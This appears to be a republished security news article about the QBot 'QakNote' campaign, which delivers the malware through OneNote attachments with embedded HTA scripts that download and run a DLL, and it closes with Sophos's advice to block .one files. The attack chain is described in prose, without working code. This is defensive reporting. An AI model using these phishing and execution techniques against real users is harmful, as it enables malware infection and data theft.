A new QBot malware campaign dubbed “QakNote” has been observed in the wild since last week, using malicious Microsoft OneNote ‘.one’ attachments to infect systems with the banking Trojan.

Qbot (a.k.a. QakBot) is a former banking Trojan that evolved into an initial device access malware, allowing threat actors to load additional malware onto compromised machines and perform data theft, ransomware, or other network-wide activity.

OneNote attachments in phishing emails appeared last month as a new attack vector to replace malicious macros in Office documents that Microsoft disabled in July 2022, leaving threat actors with fewer options to execute code on targets’ devices.

Hackers can embed almost all file types while creating malicious OneNote documents, including VBS attachments or LNK files. These are then executed when a user double-clicks the embedded attachment in a OneNote notebook.

However, it is necessary to introduce social engineering to convince users to click on a particular place to launch the embedded attachment, usually with a “Double-click to view file” button or other call to action , as shown below.

Example of malicious Microsoft OneNote attachment
Example of malicious Microsoft OneNote attachment
Source: BleepingComputer

Once launched, embedded attachments can execute commands on the local machine to download and install malware.

The QakNote campaign

In the new report from Sophossecurity researcher Andrew Brandt explains that QBot operators began experimenting with this new distribution method since January 31, 2023, using OneNote files that contain an embedded HTML application (HTA file) that retrieves the QBot malware payload .

This change in QBot’s cast was first reported publicly by Cynet researcher Max Malyutin on Twitter on January 31, 2023.

Tweeter

A script in the HTA file will use the legitimate application curl.exe to download a DLL file (the Qbot malware) to the C:\ProgramData folder and will then be executed using Rundll32.exe.

HTA File Contents
Malicious HTA File Contents (Sophos)

The QBot payload injects itself into the Windows Assistive Technology Manager (“AtBroker.exe”) to conceal its presence and evade detection by AV tools running on the device.

Sophos reports that QBot operators use two distribution methods for these HTA files: one that sends emails with an embedded link to the weaponized .one file and one where the “thread injections” method is used.

The latter is a particularly tricky technique where QBot operators hijack existing chat threads and send a “reply to all” message to its participants with a malicious OneNote Notebook file attached.

To make these attacks even more deceiving for victims, threat actors use a fake button in the Notebook file that supposedly downloads the document from the cloud, but if clicked, it executes the attachment instead. Integrated MV.

QBot malspam reaches its targets
QBot malspam file reaching targets (Sophos)

Although this action generates a warning dialog for the victim warning about the risks of running attachments, there is still a chance that it will be ignored.

To defend against this new attack vector, Sophos suggests that email administrators consider blocking all .one file extensions, as they are generally not sent as attachments.





Source link